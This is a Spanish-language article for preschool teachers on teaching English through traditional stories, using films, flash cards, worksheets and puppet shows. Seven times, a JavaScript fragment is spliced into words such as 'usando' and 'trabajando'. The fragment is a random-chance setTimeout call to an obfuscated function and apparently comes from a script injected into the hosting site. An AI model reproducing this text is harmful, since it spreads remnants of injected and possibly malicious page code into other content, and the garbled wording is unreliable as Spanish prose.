LA ENSEÑANZA DEL INGLÉS A TRAVÉS DE CUENTOS TRADICIONALES EN EL AULA DE INFANTIL:

Autora: María Teresa Cuéllar Lemus

El artículo la enseñanza del inglés a través de cuentos tradicionales en el aula de infantil explica cómo un docente puede trabajar usandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando diferentes métodos que no son los habituales libros de textos. Para ello este artículo nos propone trabajar con cuentos tradicionales ya que es un método muy original y divertido y llamará la atención de nuestros alumnos y por supuesto despertará su interés por el nuevo idioma que comienzan a estudiar.

En primer lugar tengo que comenzar diciendo que la enseñanza del inglés a través de los cuentos tradicionales es una experiencia muy enriquecedora y que nos demuestra a los maestros que podemos enseñar  nuestra materia más allá de los métodos tradicionales. Más allá de esos métodos que tantas veces nos condicionan y nos enmarcan a nosotros y, por supuesto, a nuestros alumnos en situaciones que pocas veces nos gustan.

A la hora de evitar todo esto nosotros como docentes tenemos que poner nuestra mente en funcionamiento para encontrar otros caminos que nos llevarán a encontrar los objetivos que queremos proponer para nuestros alumnos.

Es aquí donde podemos decir que un método eficaz, divertido, un método donde podremos ver a nuestros alumnos trabajandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando en grupo y muy contentos con el inglés son los cuentos tradicionales. Esos cuentos que nosotros conocemos bien, que nos han contado desde pequeños serán nuestros aliados a la hora de enseñar inglés a nuestros alumnos.

Para trabajar con cuentos tradicionales primero hemos de tener claro los objetivos y contenidos que queremos trabajar con nuestros alumnos, una vez que esto esté claro hemos de buscar el cuento que mejor le venga a lo que nos hemos propuesto.

Cuandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando sabemos qué queremos enseñar, hemos de prever cómo lo vamos a hacer. Tendremos que hacerlo de una forma divertida, que a nuestros alumnos les llame la atención y se interesen desde el primer momento en el cuento con el que vamos a trabajar.

Para empezar podemos introducir el cuento mediante algún instrumento audiovisual, por ejemplo, podemos ir al aula de informática y podemos proyectar la película del cuento en la pizarra digital u otra opción sería preparar un power point con imágenes del cuento para ir contandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando a nuestros alumnos el cuento. A medida que vamos viendo las imágenes iremos introduciendo las palabras principales que queremos enseñar en inglés.

Una vez que los alumnos han hecho una toma de contacto con el cuento con el que vamos a trabajar y con el vocabulario que queremos enseñar, podemos utilizar algún capítulo de alguna colección como Magic English o alguna similar ya que aquí los alumnos van a entrar en contacto directo con el idioma  porque estos capítulos son íntegramente en inglés y aquí deberemos estar muy atentos para ayudar a nuestros alumnos durante todo el capítulo. Dicho capítulo estará relacionado con el cuento con el que estamos trabajandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando.

Después de todo esto haremos diversos juegos con los personajes del cuento para que nuestros alumnos empiecen a adquirir el vocabulario y las diferentes expresiones que queremos que aprendan. Por ejemplo si estamos enseñandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando las partes del cuerpo haremos que nuestros alumnos vayan poniendo todas las partes del cuerpo de los personajes del cuento hasta que lo completen. Si están aprendiendo los diferentes miembros de la familia daremos flash cards a nuestros alumnos para que vayan relacionandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando los personajes entre sí…

En las siguientes sesiones siempre tendremos en cuenta a los personajes del cuento a la hora de elaborar diferentes work sheets para nuestros alumnos, las podremos elaborar nosotros mismo o ayudarnos de material complementario.

Por último podemos hacer una pequeña representación teatral como un guiñol o preparar un poster con dibujos de los personajes para contar el cuento de la historia completamente en inglés, aquí podemos interactuar con nuestros alumnos pidiéndole que repitan el vocabulario, reconociendo a los personajes,… de esta forma podremos evaluar a nuestros alumnos y ver si les ha gustado.

Estos ejemplos son solamente orientativos ya que cada uno desarrollará las actividades teniendo en cuenta el nivel y los gustos de su grupo de alumnos.

Como se puede observar trabajar a través de cuentos es algo sencillo y algo que gusta mucho a nuestros alumnos y nosotros como docentes tendremos que buscar diferentes técnicas para introducir a nuestros pequeños alumnos en un nuevo idioma en el que si trabajamos con ellos mediante técnicas divertidas como esta, resultará amena y nuestros alumnos tendrán la sensación de que aprenden de forma diferente.

Bibliografía y webgrafía:

www.funenglishforkids.com

Revista: Teacher´s Magazine

LEY ORGÁNICA, 2/2006, de 3 de Mayo, de Educación, BOE, número 106 de 4/5/2006, páginas 17158 a 17207

Escribe tu opinion

Cuentanos lo que estas pensando ...
y oh, si quieres una imagen para mostrar con su comentario, ve a buscar un gravatar!

Tu debes estar conectado para poder comentar.